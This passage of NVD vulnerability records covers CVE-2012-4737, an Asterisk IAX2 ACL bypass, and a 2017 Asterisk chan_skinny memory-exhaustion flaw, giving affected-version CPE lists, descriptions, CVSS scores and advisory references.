              "matchCriteriaId": "627FF5B9-E5A8-4DBC-A891-B175011E72A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6146EB2E-BA32-4408-B10B-A711EC39C580",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1C863324-05AE-4FCA-BD2E-39040A468DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A85F51E7-0AAE-4F3B-9F90-BD2E31255822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "315FB0D4-D4A4-4369-BFB8-F2CAEB429015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "DC74D6C5-F410-4B68-AF92-056B727193A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B70911F8-A526-4600-8198-03FF4CCB28DE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA60A9C9-C2EF-4971-BEFB-FF687DAEF2F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "BAFB22FA-CC24-4AFE-AC83-2D044563F7CE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "00F3EB0D-7C63-46B5-BA95-8486B9716C78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "00C1BF3B-7593-478D-9AAA-153901C70286",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "82423EC2-FA29-4AF6-86C3-6AC6DFDC4DC5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "5F86406A-0936-4A06-88FB-4137A64498EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "672CE4C0-EBD6-470B-937E-810FF1C4CDBD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88DB1105-74D8-4312-9D02-D1E21F2E785C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "404C0557-6229-4D90-BFDD-54AFFCCE6A19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6D1D26CC-891F-4396-B7D7-30D712829E71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F25B61EA-F4D1-452A-9D96-B8DFDD719B0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9324AB96-EC99-4F04-A0A9-00F936C86EFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1B8B5E76-4A74-4E88-8A6F-C23538B7642A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "BDB6BBCA-47CE-49B8-9706-AFDE4BE46550",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "8BFF65E2-692B-4C39-88FC-6DED8D9A7258",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5260E309-9320-4DB8-A918-7D215BF95D2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "60AFF340-A866-4CFE-9334-53B95FD4AA59",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "74E50309-CD7D-41F7-97DA-A7E451D0796A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "6FD3F8F8-820E-4C29-9F8F-023D1DB999CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "C33A6419-0D00-49D6-9A48-2B633610AAED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "447E07C9-4A25-418D-B53F-609B78EE4C21",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8E8AE686-B618-4B0D-BD27-1F96295E964D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E9751C0A-84F5-4A43-8282-12A9DE559569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "F67E2694-F6F1-482C-91F2-D9FD856EA31B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E2D53AA-8D50-445F-9500-2F580F260DC0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D9D7D88-D64F-4F54-8C84-6AC45FBD36F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F67AB282-591C-4ED7-9750-C593A38D5D7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C9F8F881-2BF7-44AB-8756-54A06801EB11",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "36EFF3C4-4D00-4BC5-94B9-403BB00C6AB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "5E434F10-395E-426E-A988-4CDA504577D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8880AE7C-3E44-4B76-B500-E93868D4CF5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7C94269D-A271-42AC-A44C-102C814E564B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E7E5B826-D3D5-4D2D-BB4D-2C1BEDE92456",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5BA564F7-7A69-4805-8C8C-C2EB5E12A6E2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF6FA464-F9D3-4674-844B-A2B2E2C42A51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "44722C8B-BB37-4444-A58A-F01D0B3B4DDA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4FABFDB-D99A-4F83-8FEE-3BFA36BA4061",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A842E112-8974-4E74-AD56-1DEF5B5DD9F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D9ACBC01-8A9D-43A5-A825-1CC9670417A6",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "687ED3CE-67C4-410D-8AF4-C769015598F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "30E918CD-89C4-42DA-9709-E50E0A3FA736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "DA57FA15-D0D7-4A97-9C25-6F6566940098",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A1C45300-A2CF-40E7-AB67-23DC24C31A1D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "958081DC-1D77-45CD-A940-C7A1AB42C7BA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "298A879D-4F65-4523-A752-D17C4F81B822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "37AB07BE-54C4-4972-A05F-D1E2CF4363CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "EBC63564-A84E-463D-8312-DDF1C6B7796F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "62A0906E-B631-4F3A-9ABC-9A43A43220BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C6314ADA-2849-416D-966E-C01C322EF904",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8B6CB1DD-614A-4B3D-99AE-9B1341427024",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC95B04F-3746-4F1C-8428-A1FA10253E14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "20819080-E0AB-4879-B4CF-A154D6F7EF6F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6C45753-E2CC-4F7C-B8DA-3D8CF255EA22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5A080197-D6AA-4FDC-888E-51D1C8251E34",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "1F08D930-D4C1-4C63-875C-171C46AE97C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1AA43D7D-AEAD-47CB-BFA5-B73004A1A7A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "B5ED5F6F-166D-4610-8939-A33AD45F1ADE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1D40002A-564E-425C-BA2A-7C4A8F8DAFD7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "521C4DB2-7127-4BA9-94FC-AB0E9E06FE2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8C905DC1-8AB8-4D83-BB5B-FA4DABC58229",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "ECC74B5D-97A1-46FF-AFA3-5D5E4A0BF3A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "F2D98C7C-94A8-4348-AF22-04A41FB6F8EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "85D39A99-E9A6-4860-BC61-56CA2FC3238B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "845DA0A4-1983-4E82-99C8-B7FBF47C632E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5A63FBB7-F1CF-4603-848F-980742D2ED36",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "10B2084F-3AF4-4008-899C-6C1E43715201",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "217C13A5-9F8A-4392-858F-2FC88B03EB0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "6B282462-900C-492E-98DE-65364E62F5E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "687784F0-9ACC-435D-81F9-1E1B0F61010C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9D7D020C-FE32-408B-BE37-58835FD3D95F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "39B7938F-7370-4F67-B0CD-1C14DE2E4E7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC587195-5973-423B-8BF9-3E0B27363B76",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1FBE5780-D503-46D1-BE04-4CB7B662B5DF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CB19323D-208F-45F9-85F3-BAA5D1BC3AA6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "09334CAB-9ADB-49BB-BE83-BBAC6A7A9F47",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "DC6DEEF5-7277-4E38-9233-E3612CD77CCF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "75A0D613-3D04-4902-9707-E743F30CF1A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "54AB61A7-E143-4BEC-8658-68FF615B007E",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert:*:*:*:*:*:*",
              "matchCriteriaId": "C63C46CC-02E2-40AF-8281-F2FB5D89823A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "71BAF2A7-024D-475A-88C0-0F5ADE3CA286",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "82F91FE8-C320-466B-AF08-67319A00A2BC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "DCFF0E1C-B455-4C18-8AA1-10408234327B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "738F68B3-2C5E-4A09-8FF4-2D034ED0C54D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "6A60C223-AD68-4BFF-91C1-2C7E9F727AA6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "4C313F81-8B38-4845-B1C7-CBB23D7C99B6",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.2:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "E65E012A-49B6-4796-B1FA-A83C9248D0EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "9F4C24B7-22E3-4E56-9B9F-414101B627FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.1:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "1813B898-F957-40D7-AF9A-064FB57D5C82",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.7.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "C5D07DB0-7C6A-4490-8FD0-DC83568E0421",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "78E8936C-033B-49E6-BB39-D5BBBC80EB55",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.1.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "5D05D04F-CD6C-4A73-885C-306D7A5CC7C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.1.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "3805B5F3-A4CD-469F-9F8A-A271A79A2B7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.2.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "9FAEBE5E-378A-40DC-B2B9-31F6D1305BCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.2.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "617B3FE8-39E3-41C0-9348-9507DA43DE93",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.3.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "04AB4C82-71BB-49B7-B4F3-4E75EFB5F1A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.6.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "78B55176-E269-411B-974A-B5D2CE8E08C2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.6.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "9BCF12B0-4B8D-499D-B5DE-FB0CD9EEC3B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.6.4:-:business:*:*:*:*:*",
              "matchCriteriaId": "9ED68059-F0E5-4B1B-B633-466D92F38346",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.7.5:-:business:*:*:*:*:*",
              "matchCriteriaId": "BFE16F42-025D-4C9D-AD4A-08FDEF957F09",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "channels/chan_iax2.c in Asterisk Open Source 1.8.x before 1.8.15.1 and 10.x before 10.7.1, Certified Asterisk 1.8.11 before 1.8.11-cert7, Asterisk Digiumphones 10.x.x-digiumphones before 10.7.1-digiumphones, and Asterisk Business Edition C.3.x before C.3.7.6 does not enforce ACL rules during certain uses of peer credentials, which allows remote authenticated users to bypass intended outbound-call restrictions by leveraging the availability of these credentials."
    },
    {
      "lang": "es",
      "value": "channels/chan_iax2.c en Asterisk Open Source v1.8.x antes de v1.8.15.1 y v10.x antes de v10.7.1, Certified Asterisk v1.8.11-1.8.11 antes de cert7, Digiumphones Asterisk v10.xx-digiumphones antes de v10.7.1-digiumphones y Asterisk Business Edition C.3.x antes de C.3.7.6 no hace cumplir las reglas de ACL durante ciertos usos del par de credenciales, lo que permite a usuarios remotos autenticados eludir las restricciones de llamadas de salida aprovech\u00e1ndose de la disponibilidad de estas credenciales.\r\n"
    }
  ],
  "id": "CVE-2012-4737",
  "lastModified": "2024-11-21T01:43:26.073",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 6.8,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2012-08-31T14:55:01.387",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-013.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/50687"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/50756"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2012/dsa-2550"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/55335"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id?1027461"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-013.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/50687"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/50756"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2012/dsa-2550"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/55335"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id?1027461"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-264"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2017-12-02 00:29

Modified

2024-11-21 03:17

Severity ?

7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

An issue was discovered in chan_skinny.c in Asterisk Open Source 13.18.2 and older, 14.7.2 and older, and 15.1.2 and older, and Certified Asterisk 13.13-cert7 and older. If the chan_skinny (aka SCCP protocol) channel driver is flooded with certain requests, it can cause the asterisk process to use excessive amounts of virtual memory, eventually causing asterisk to stop processing requests of any kind.

References

URL	Tags
cve@mitre.org	http://downloads.digium.com/pub/security/AST-2017-013.html	Vendor Advisory
cve@mitre.org	http://www.securityfocus.com/bid/102023	Third Party Advisory, VDB Entry
cve@mitre.org	http://www.securitytracker.com/id/1039948
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-27452	Issue Tracking, Vendor Advisory
cve@mitre.org	https://lists.debian.org/debian-lts-announce/2017/12/msg00028.html
cve@mitre.org	https://www.debian.org/security/2017/dsa-4076
cve@mitre.org	https://www.exploit-db.com/exploits/43992/
af854a3a-2127-422b-91ae-364da2661108	http://downloads.digium.com/pub/security/AST-2017-013.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/102023	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1039948
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-27452	Issue Tracking, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2017/12/msg00028.html
af854a3a-2127-422b-91ae-364da2661108	https://www.debian.org/security/2017/dsa-4076
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/43992/

Impacted products

Vendor	Product	Version
digium	certified_asterisk	*
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "DF0E7AD0-0B51-47BC-8746-CAC7C63F8AE8",
              "versionEndIncluding": "13.13",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "0449B393-FA4E-4664-8E16-BE6B94E4872F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2ED8E415-64FA-4E77-A423-3478E606E58E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E13CA1DD-B384-4408-B4EC-1AA829981016",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EE28BD0A-EA30-4265-A5D6-0390F3558D44",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc4:*:*:*:*:*:*",
              "matchCriteriaId": "0F82048D-C65F-4439-BBE4-2D4A9B07EB7E",
              "vulnerable": true
            },
            {
